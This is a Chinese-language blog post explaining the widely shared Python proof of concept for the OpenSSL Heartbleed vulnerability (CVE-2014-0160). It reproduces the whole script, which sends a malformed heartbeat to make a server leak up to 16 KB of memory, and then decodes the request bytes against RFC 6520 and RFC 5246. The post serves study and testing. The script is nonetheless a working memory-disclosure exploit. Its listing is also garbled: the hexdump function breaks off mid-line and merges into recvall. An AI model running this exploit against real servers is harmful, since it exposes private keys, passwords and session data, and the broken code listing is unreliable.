OpenSSL 的 Heartbleed 漏洞的影響到底有多大?看了本文就知道了!
OpenSSL 的 Heartbleed 漏洞的影響到底有多大?
關(guān)于OpenSSL“心臟出血”漏洞的分析
漏洞相關(guān)的代碼就不分析了,上面的文章已經(jīng)分析的很清楚了,下面主要分析一下網(wǎng)絡(luò)上流傳甚廣的python POC文件。
#!/usr/bin/python #?Quick?and?dirty?demonstration?of?CVE-2014-0160?by?Jared?Stafford?(jspenguin@jspenguin.org) #?The?author?disclaims?copyright?to?this?source?code. import?sys import?struct import?socket import?time import?select import?re from?optparse?import?OptionParser options?=?OptionParser(usage='%prog?server?[options]',?description='Test?for?SSL?heartbeat?vulnerability?(CVE-2014-0160)') options.add_option('-p',?'--port',?type='int',?default=443,?help='TCP?port?to?test?(default:?443)') def?h2bin(x): ????return?x.replace('?',?'').replace('n',?'').decode('hex') hello?=?h2bin(''' 16?03?02?00??dc?01?00?00?d8?03?02?53 43?5b?90?9d?9b?72?0b?bc??0c?bc?2b?92?a8?48?97?cf bd?39?04?cc?16?0a?85?03??90?9f?77?04?33?d4?de?00 00?66?c0?14?c0?0a?c0?22??c0?21?00?39?00?38?00?88 00?87?c0?0f?c0?05?00?35??00?84?c0?12?c0?08?c0?1c c0?1b?00?16?00?13?c0?0d??c0?03?00?0a?c0?13?c0?09 c0?1f?c0?1e?00?33?00?32??00?9a?00?99?00?45?00?44 c0?0e?c0?04?00?2f?00?96??00?41?c0?11?c0?07?c0?0c c0?02?00?05?00?04?00?15??00?12?00?09?00?14?00?11 00?08?00?06?00?03?00?ff??01?00?00?49?00?0b?00?04 03?00?01?02?00?0a?00?34??00?32?00?0e?00?0d?00?19 00?0b?00?0c?00?18?00?09??00?0a?00?16?00?17?00?08 00?06?00?07?00?14?00?15??00?04?00?05?00?12?00?13 00?01?00?02?00?03?00?0f??00?10?00?11?00?23?00?00 00?0f?00?01?01?????????????????????????????????? ''') hb?=?h2bin('''? 18?03?02?00?03 01?40?00 ''') def?hexdump(s): ????for?b?in?xrange(0,?len(s),?16): ????????lin?=?[c?for?c?in?s[b?:?b?+?16]] ????????hxdat?=?'?'.join('%02X'?%?ord(c)?for?c?in?lin) ????????pdat?=?''.join((c?if?32?<=?ord(c)??0: ????????rtime?=?endtime?-?time.time()? ????????if?rtime?<?0: ????????????return?None ????????r,?w,?e?=?select.select([s],?[],?[],?5) ????????if?s?in?r: ????????????data?=?s.recv(remain) ????????????#?EOF? ????????????if?not?data: ????????????????return?None ????????????rdata?+=?data ????????????remain?-=?len(data) ????return?rdata ???????? def?recvmsg(s): ????hdr?=?recvall(s,?5) ????if?hdr?is?None: ????????print?'Unexpected?EOF?receiving?record?header?-?server?closed?connection' ????????return?None,?None,?None ????typ,?ver,?ln?=?struct.unpack('>BHH',?hdr) ????pay?=?recvall(s,?ln,?10) ????if?pay?is?None: ????????print?'Unexpected?EOF?receiving?record?payload?-?server?closed?connection' ????????return?None,?None,?None ????print?'?...?received?message:?type?=?%d,?ver?=?%04x,?length?=?%d'?%?(typ,?ver,?len(pay)) ????return?typ,?ver,?pay def?hit_hb(s): ????s.send(hb) ????while?True: ????????typ,?ver,?pay?=?recvmsg(s) ????????if?typ?is?None: ????????????print?'No?heartbeat?response?received,?server?likely?not?vulnerable' ????????????return?False ????????if?typ?==?24: ????????????print?'Received?heartbeat?response:' ????????????hexdump(pay) ????????????if?len(pay)?>?3: ????????????????print?'WARNING:?server?returned?more?data?than?it?should?-?server?is?vulnerable!' ????????????else: ????????????????print?'Server?processed?malformed?heartbeat,?but?did?not?return?any?extra?data.' ????????????return?True ????????if?typ?==?21: ????????????print?'Received?alert:' ????????????hexdump(pay) ????????????print?'Server?returned?error,?likely?not?vulnerable' ????????????return?False def?main(): ????opts,?args?=?options.parse_args() ????if?len(args)?<?1: ????????options.print_help() ????????return ????s?=?socket.socket(socket.AF_INET,?socket.SOCK_STREAM) ????print?'Connecting...' ????sys.stdout.flush() ????s.connect((args[0],?opts.port)) ????print?'Sending?Client?Hello...' ????sys.stdout.flush() ????s.send(hello) ????print?'Waiting?for?Server?Hello...' ????sys.stdout.flush() ????while?True: ????????typ,?ver,?pay?=?recvmsg(s) ????????if?typ?==?None: ????????????print?'Server?closed?connection?without?sending?Server?Hello.' ????????????return ????????#?Look?for?server?hello?done?message. ????????if?typ?==?22?and?ord(pay[0])?==?0x0E: ????????????break ????print?'Sending?heartbeat?request...' ????sys.stdout.flush() ????s.send(hb) ????hit_hb(s) if?__name__?==?'__main__': ????main()
上面比較重要和難以理解的是hello和hb兩個(gè)字符串的意思到底是什么。
首先看hb這個(gè)字符串的幾個(gè)字節(jié)是什么意思, 通過閱讀RFC6520我們可以得到heartbeat的數(shù)據(jù)結(jié)構(gòu):
The Heartbeat protocol messages consist of their type and an?arbitrary payload and padding.
?
? enum {
? ? ? heartbeat_request(1),
? ? ? heartbeat_response(2),
? ? ? (255)
? ?} HeartbeatMessageType;
? ?struct {
? ? ? HeartbeatMessageType type;
? ? ? uint16 payload_length;
? ? ? opaque payload[HeartbeatMessage.payload_length];
? ? ? opaque padding[padding_length];
? ?} HeartbeatMessage;
這個(gè)數(shù)據(jù)結(jié)構(gòu)的總長度不能超過2的14次方。
type: ?消息類型, ?heartbeat_request 或者?heartbeat_response中的一個(gè),不是0x01就是0x02,1byte。
payload_length: payload的長度, 2個(gè)bytes。
payload:內(nèi)容是任意的東西,接收端收到之后必須忽略掉里面的具體內(nèi)容,如果接收端響應(yīng)這個(gè)request,那么需要將里面的內(nèi)容原封不動(dòng)拷貝回發(fā)送端。
padding: 也是一些隨即的亂起八糟的內(nèi)容,必須被接收端忽略掉。
padding_length: ?TLSPlaintext.length - payload_length - 3 for TLS 或者?DTLSPlaintext.length - payload_length - 3 for DTLS. ?至少是16bytes.
在這個(gè)RFC6520中有下面一句話,IANA has assigned the heartbeat content type (24) from the "TLS?ContentType Registry" as specified in [RFC5246]
意思就是說IANA這個(gè)組織把heartbeat content type的編號(hào)定為了24
我們?nèi)FC5246中查找TLSPlaintext結(jié)構(gòu)的定義。
RFC5246附錄A中開頭的定義如下:
struct {
? ? ? ?uint8 major;
? ? ? ?uint8 minor;
? ?} ProtocolVersion;
? ?ProtocolVersion version = { 3, 3 }; ? ? /* TLS v1.2*/
? ?enum {
? ? ? ?change_cipher_spec(20), alert(21), handshake(22),
? ? ? ?application_data(23), (255)
? ?} ContentType;
? ?struct {
? ? ? ?ContentType type;
? ? ? ?ProtocolVersion version;
? ? ? ?uint16 length;
? ? ? ?opaque fragment[TLSPlaintext.length];
? ?} TLSPlaintext;
type:1個(gè)byte,這里應(yīng)該是heartbeat,24, 0x18
version:2個(gè)bytes
length:2個(gè)bytes
fragment: 具體的extension的message.
上面這一系列數(shù)據(jù)結(jié)構(gòu)翻譯成用c語言的數(shù)據(jù)結(jié)構(gòu)就是:
struct {
? ? ? ?ContentType type; ? ? ? ? //1byte
? ? ? ?ProtocolVersion version; //2bytes
? ? ? ?uint16 length; ? ? ? ? ? ? ? ? ? ?//2bytes
? ? ? ?HeartbeatMessageType type; ? ? ? ? ?//1bytes
? ? ? ?uint16 payload_length; ? ? ? ? ? ? ? ? ? //2bytes
? ? ? ?char payload[payload_length]; ? ??
? ? ? ?char padding[padding_length];
}HeartBeatPlainText;
這樣我們就可以對(duì)應(yīng)的看出來hb到底是什么意思了:
hb = h2bin('''?
18 03 02 00 03
01 40 00
''')
18表示heartbeat type
03 02表示TLS的版本號(hào),這里表示TLS v1.1
00 03表示heartbeatmessage的長度,也就是TLSplaintext的payload的長度
01表示heartbeat_request
40 00 表示payload length, 2**14
其中payload和padding都沒有,這樣正好就可以利用漏洞將后面內(nèi)存中的數(shù)據(jù)dump出來了。
OK, 現(xiàn)在hb已經(jīng)清楚了。
hello有225bytes, 具體的每個(gè)域的意思可以參考RFC 5246 7.4.1?
https://tools.ietf.org/html/rfc5246#section-7.4.1
最好通過wireshark抓https的包來看client hello的解析。一目了然。
另外:通過在自己機(jī)器上測試發(fā)現(xiàn)XAMPP for Linux 1.8.3-3用的就是有漏洞的版本的openssl, 可以用這個(gè)腳本來進(jìn)行測試,抓包。